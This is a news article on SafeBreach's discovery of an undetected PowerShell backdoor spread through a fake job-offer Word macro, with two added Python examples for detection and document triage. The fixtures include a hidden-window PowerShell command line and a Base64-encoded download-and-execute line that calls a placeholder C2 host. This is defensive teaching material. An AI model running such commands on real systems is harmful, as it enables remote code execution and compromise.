www.msn.com
204.79.197.203
URL: https://www.msn.com/en-us/news/technology/fully-undetectable-windows-backdoor-gets-detected/ar-AA136Pig?ocid=entnews...
Submission: On October 26 via manual from MX — Scanned from DE
SAFEBREACH SUPPOSEDLY SPOTS SOMEWHAT STEALTHY SUBVERSIVE SOFTWARE

SafeBreach Labs says it has detected a novel fully undetectable (FUD) PowerShell backdoor, which calls into question the accuracy of threat naming… More significantly, the malware may backdoor your Windows system by masquerading as part of the update process.

Tomer Bar, director of security research at SafeBreach, explains in an advisory that the software nasty and associated command-and-control (C2) backend appear to have been developed by a competent unknown miscreant – though one not savvy enough to avoid mistakes that allowed SafeBreach researchers to figure out what was going on, natch.

"The attack starts with a malicious Word document, which includes a macro that launches an unknown PowerShell script," said Bar. "The name of the Word document is 'Apply Form[.]docm.'"

According to Bar, the malicious Word document was uploaded from Jordan on August 25, 2022. The file appears to have been part of a phishing campaign designed to look like a LinkedIn-based job offer, in order to entice victims to open it. The mark would have to allow the macro in the Word document to run for an infection to be successful.

Asked to provide more details, a SafeBreach spokesperson said, "We don't have additional information about the targets, but we believe that this is a sophisticated targeted attack, possibly related to the phishing attempts targeted at job seekers." About 100 victims are said to have been affected.

"The macro drops updater.vbs, creates a scheduled task pretending to be part of a Windows update, which will execute the updater.vbs script from a fake update folder under '%appdata%\local\Microsoft\Windows'," explained Bar. The updater.vbs script then runs a PowerShell script that opens a remote-control backdoor on the box.

According to Bar, prior to executing the scheduled task, the malware creates two PowerShell scripts, Script.ps1 and Temp.ps1.
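The chain Bar describes (a macro drops updater.vbs, registers a scheduled task posing as Windows Update, the task runs the VBS from a folder under the user's AppData tree, and the VBS spawns PowerShell) leaves a recognisable trail in endpoint telemetry. The following is an added example, not code from SafeBreach or The Register: it runs a handful of rules over constructed Sysmon-style process-creation events and a constructed Security 4698 "scheduled task created" event. The folder name WindowsUpdate, the task name, the schtasks command line and the user "victim" are assumptions; the article gives only the parent path and the file names. The article's '%appdata%\local\Microsoft\Windows' is read as AppData\Local\Microsoft\Windows, and the pattern also accepts the Roaming tree in case that reading is wrong.

```python
"""Hunt for the updater.vbs / fake-update scheduled-task chain in endpoint
telemetry. Added example: the events below are constructed, not real logs."""
import re
from typing import Iterable

# Article gives '%appdata%\local\Microsoft\Windows'; %APPDATA% is really the
# Roaming tree, so accept either reading (assumption).
FAKE_UPDATE_TREE = re.compile(r"\\AppData\\(Local|Roaming)\\Microsoft\\Windows\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed sample events. "id" 1 mimics Sysmon process creation, "id" 4698
# mimics Security "scheduled task created". Folder name WindowsUpdate, the
# task name, the schtasks arguments and the user "victim" are assumptions.
UPD = r"C:\Users\victim\AppData\Local\Microsoft\Windows\WindowsUpdate"
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\Apply Form.docm"'},
    {"id": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'schtasks.exe /Create /SC ONLOGON /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" '
                    rf'/TR "wscript.exe {UPD}\updater.vbs"'},
    {"id": 4698, "TaskName": r"\Microsoft\Windows\WindowsUpdate\Scheduled Start",
     "Actions": rf"C:\Windows\System32\wscript.exe {UPD}\updater.vbs"},
    {"id": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",  # Task Scheduler service host
     "CommandLine": rf'wscript.exe "{UPD}\updater.vbs"'},
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": rf'powershell.exe -ep bypass -w hidden -File "{UPD}\Script.ps1"'},
    # Benign look-alikes that must not fire: the real update client task, and
    # an admin running a Microsoft-shipped .vbs from System32.
    {"id": 4698, "TaskName": r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
     "Actions": r"%systemroot%\system32\usoclient.exe StartScan"},
    {"id": 1, "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript.exe C:\Windows\System32\slmgr.vbs /dli"},
]


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[str]:
    """Return the names of the rules this single event trips (possibly none)."""
    hits = []
    if ev["id"] == 1:
        img, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev["CommandLine"]
        if parent in OFFICE and img in SCRIPT_HOSTS | {"schtasks.exe", "powershell.exe"}:
            hits.append("office_spawns_script_host_or_schtasks")
        if img in SCRIPT_HOSTS and re.search(r"\.vbs\b", cmd, re.I) and FAKE_UPDATE_TREE.search(cmd):
            hits.append("script_host_runs_vbs_from_appdata_windows_tree")
        if img == "powershell.exe" and parent in SCRIPT_HOSTS:
            hits.append("script_host_spawns_powershell")
        if img == "powershell.exe" and re.search(r"\.ps1\b", cmd, re.I) and FAKE_UPDATE_TREE.search(cmd):
            hits.append("powershell_runs_ps1_from_appdata_windows_tree")
    elif ev["id"] == 4698:
        name, act = ev["TaskName"], ev["Actions"]
        if re.search(r"\.vbs\b", act, re.I) and FAKE_UPDATE_TREE.search(act):
            hits.append("task_action_runs_vbs_from_appdata_windows_tree")
        # Tasks under \Microsoft\Windows\ should not reach into a user profile.
        if re.search(r"^\\Microsoft\\Windows\\", name, re.I) and re.search(r"\\Users\\", act, re.I):
            hits.append("microsoft_named_task_with_user_profile_action")
    return hits


def hunt(events: Iterable[dict]) -> list[tuple[int, list[str]]]:
    """Pair each event index with the rules it tripped, skipping clean events."""
    out = []
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            out.append((i, hits))
    return out


def chain_score(events: Iterable[dict]) -> int:
    """Number of distinct chain stages observed; the full chain trips all six."""
    return len({rule for _, hits in hunt(events) for rule in hits})


if __name__ == "__main__":
    for i, hits in hunt(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(i, ev.get("Image", ev.get("TaskName")), hits)
    print("distinct stages:", chain_score(SAMPLE_EVENTS))
```

Each rule on its own is noisy (admins do run wscript, and Office does spawn schtasks in some environments), which is why chain_score counts distinct stages on the same host: two or more of them within a short window is the signal worth paging on. If the macro registers the task through the Schedule.Service COM object rather than schtasks.exe, the second event never appears, but the 4698 record and everything after it still do.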
The content of both scripts is obfuscated and stored in text boxes within the Word file, and is written out to the fake update directory at run time. As a result, the scripts themselves were not detected on VirusTotal. Script.ps1 calls out to the C2 server to obtain a victim ID number and to fetch commands to execute. It then runs Temp.ps1, which either stores information or executes PowerShell commands, depending on the parameters passed by the initial script.

According to Bar, the attacker messed up by issuing victim identifiers in a predictable sequence. This allowed the security researchers to develop a script that presented each victim's identifier to the backend system, so they could record the interactions with the C2 server in a packet capture. Thereafter they were able to use a second tool to extract the encrypted commands from the captured packets and decipher what the malware was doing.

Microsoft recently changed the default behavior of Office apps to block macros in files downloaded from the internet, something previously possible through a Trust Center policy. We asked SafeBreach whether this might offer any protection.

"Yes, if macros are disabled, this attack vector won't work," a spokesperson said. "But if the threat actor uses a different attack vector (exploits for example instead of macros), the FUD PowerShell malware would work and spy on the victim." ®
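The article notes that the two PowerShell scripts live, obfuscated, in text boxes inside the Word file rather than in the macro itself, which is why a scanner that only looks at the VBA project sees nothing. A .docm is an OOXML zip, so a triage step can pull text-box content straight out of word/document.xml and check for a VBA part. The block below is an added example, not SafeBreach's tooling: it builds a constructed stand-in for the document in memory, separates visible body text from text-box text, and attempts to decode what it finds. Base64 is a stand-in for whatever obfuscation the real file used (the article does not describe it), the C2 URL is a placeholder under the .example TLD, and the vbaProject.bin part is a dummy, not a real OLE stream.

```python
"""Triage a macro-enabled Word package: does it carry a VBA part, and what do
its text boxes hold? Added example with a constructed sample document."""
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
VML = "urn:schemas-microsoft-com:vml"


def build_sample_docm() -> bytes:
    """Construct a minimal stand-in for 'Apply Form.docm' in memory.

    The visible body is a job-offer line; two VML text boxes carry Base64
    stand-ins for Script.ps1 and Temp.ps1 (the real obfuscation is not
    described in the article); a vbaProject.bin part marks the file as
    macro-enabled. The C2 URL is a placeholder.
    """
    def textbox(text: str) -> str:
        return ("<w:p><w:r><w:pict><v:shape><v:textbox><w:txbxContent>"
                f"<w:p><w:r><w:t>{text}</w:t></w:r></w:p>"
                "</w:txbxContent></v:textbox></v:shape></w:pict></w:r></w:p>")

    script = base64.b64encode(
        b"IEX (New-Object Net.WebClient).DownloadString('http://c2.example/register')").decode()
    temp = base64.b64encode(b"param($cmd); Invoke-Expression $cmd").decode()
    document = (f'<w:document xmlns:w="{W}" xmlns:v="{VML}"><w:body>'
                "<w:p><w:r><w:t>Thank you for applying. Enable content to view the offer.</w:t></w:r></w:p>"
                f"{textbox(script)}{textbox(temp)}</w:body></w:document>")
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/word/document.xml" '
        'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
        '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        "</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document)
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder, not a real OLE stream")
    return buf.getvalue()


def try_base64(s: str):
    """Decode s if it is well-formed Base64 of printable ASCII, else None."""
    s = re.sub(r"\s+", "", s)
    if not s or len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


# Download-and-execute idioms worth flagging in anything that decodes to text.
PS_HINTS = re.compile(r"(?i)\b(IEX|Invoke-Expression|DownloadString|Net\.WebClient|FromBase64String)\b")


def triage_docm(data: bytes) -> dict:
    """Split body text from text-box text and flag macro + PowerShell hints."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        content_types = z.read("[Content_Types].xml").decode()
        root = ET.fromstring(z.read("word/document.xml"))
    t_tag = f"{{{W}}}t"
    boxes, boxed_runs = [], set()
    for box in root.iter(f"{{{W}}}txbxContent"):
        runs = list(box.iter(t_tag))
        boxed_runs.update(id(r) for r in runs)
        boxes.append("".join(r.text or "" for r in runs))
    # Body text is every w:t run that did not sit inside a text box.
    body = "".join(t.text or "" for t in root.iter(t_tag) if id(t) not in boxed_runs)
    decoded = [d for d in map(try_base64, boxes) if d is not None]
    return {
        "has_vba": "word/vbaProject.bin" in names or "macroEnabled" in content_types,
        "body_text": body,
        "textboxes": boxes,
        "decoded": decoded,
        "powershell_hints": any(PS_HINTS.search(d) for d in decoded),
    }


if __name__ == "__main__":
    for key, value in triage_docm(build_sample_docm()).items():
        print(f"{key}: {value}")
```

Against a real sample, replace build_sample_docm() with the bytes of the file and expect try_base64 to return None for most boxes; the point of the split is that text-box content with no visible purpose in a one-page job offer is itself the finding, whatever encoding it turns out to use. Text boxes saved by newer Word builds sit inside mc:AlternateContent/wps:txbx rather than v:textbox, but both wrap the same w:txbxContent element, so the iterator above catches either form.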